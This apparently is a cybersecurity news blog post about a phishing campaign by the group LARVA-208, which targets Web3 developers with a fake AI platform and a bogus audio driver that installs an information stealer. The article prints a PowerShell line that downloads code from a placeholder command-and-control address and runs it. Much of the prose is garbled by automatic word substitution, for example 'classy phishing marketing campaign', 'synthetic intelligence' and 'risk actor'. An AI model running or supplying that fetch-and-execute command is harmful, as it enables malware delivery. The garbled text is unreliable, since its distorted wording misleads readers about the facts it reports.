Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New Web3 Phishing Attack Leverages Fake AI Platforms to Steal Usernames and Passwords

New Web3 Phishing Attack Leverages Fake AI Platforms to Steal Usernames and Passwords

Posted on July 22, 2025July 22, 2025 By CWS

A classy phishing marketing campaign focusing on Web3 builders has emerged, exploiting the rising curiosity in synthetic intelligence platforms to ship credential-stealing malware.

The risk actor LARVA-208, beforehand recognized for focusing on IT employees by means of phone-based social engineering, has pivoted to concentrate on blockchain builders utilizing a meticulously crafted pretend AI workspace platform.

The assault begins with seemingly professional job presents or portfolio evaluate requests despatched to Web3 builders, directing them to fraudulent AI Firm functions.

These communications leverage the MITRE ATT&CK method T1566.002 (Spearphishing Hyperlink) to lure victims into accessing malicious platforms utilizing distinctive invitation codes and e-mail addresses.

As soon as victims have interaction with the pretend platform, they encounter a misleading error message claiming their audio drivers are outdated or lacking, prompting them to obtain what seems to be a real Realtek HD Audio Driver.

LARVA-208’s assault chain focusing on Web3 builders (Supply – Catalyst)

Catalyst analysts recognized that LARVA-208 has strategically created a convincing reproduction of the professional Teampilot AI workspace platform by means of their malicious area “norlax.ai.”

This area typosquatting method (T1583.001 – Domains) creates a virtually equivalent interface to deceive unsuspecting builders who could also be aware of professional AI collaboration instruments.

The downloaded “driver” is definitely refined malware that executes embedded PowerShell instructions (T1059.001 – PowerShell) to retrieve and deploy the Fickle stealer from LARVA-208’s command and management infrastructure.

The PowerShell execution will be represented as:-

# Simplified illustration of the malicious payload execution
Invoke-WebRequest -Uri “C2_SERVER_URL” | Invoke-Expression

Superior Knowledge Exfiltration Capabilities

The Fickle stealer demonstrates complete information-gathering capabilities, systematically harvesting system identification information, {hardware} specs, working system particulars, and geolocation info together with IP addresses and geographic places.

The malware catalogs put in software program, displays lively processes, and transmits all collected intelligence to LARVA-208’s command and management servers (T1583.004 – Server), that are hosted by means of FFv2’s bulletproof internet hosting service.

Safety researchers have immediately attributed this marketing campaign to the broader Luminous Mantis risk group, indicating a coordinated effort to broaden past conventional IT focusing on into the profitable Web3 developer ecosystem.

Increase detection, scale back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Attempt ANY.RUN Now

Cyber Security News Tags:Attack, Fake, Leverages, Passwords, Phishing, Platforms, Steal, Usernames, Web3

Post navigation

Previous Post: How to Use Threat Intelligence to Enhance Cybersecurity Operations
Next Post: Threat Actors Attacking Linux SSH Servers to Deploy SVF Botnet

Related Posts

Critical Cisco IOS XR Vulnerabilities Demand Immediate Attention Critical Cisco IOS XR Vulnerabilities Demand Immediate Attention Cyber Security News
RoadK1ll Malware Threatens Network Security with Stealthy Relays RoadK1ll Malware Threatens Network Security with Stealthy Relays Cyber Security News
Hackers Target SolarWinds Vulnerability to Deploy Tools Hackers Target SolarWinds Vulnerability to Deploy Tools Cyber Security News
QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code Cyber Security News
ServiceNow AI Platform Patch Fixes Critical RCE Vulnerability ServiceNow AI Platform Patch Fixes Critical RCE Vulnerability Cyber Security News
Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data Infostealers Actively Attacking macOS Users in The Wild to Steal Sensitive Data Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • F5 Resolves Over 50 Security Flaws in Software
  • Windows Vulnerabilities: BitLocker Bypass and CTFMON Exploit
  • Seedworm Group Exploits Signed Binaries for Cyber Attacks
  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • F5 Resolves Over 50 Security Flaws in Software
  • Windows Vulnerabilities: BitLocker Bypass and CTFMON Exploit
  • Seedworm Group Exploits Signed Binaries for Cyber Attacks
  • Vulnerability in PraisonAI Exploited Within Hours
  • Langflow Vulnerability Exploited for AWS Key Theft

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark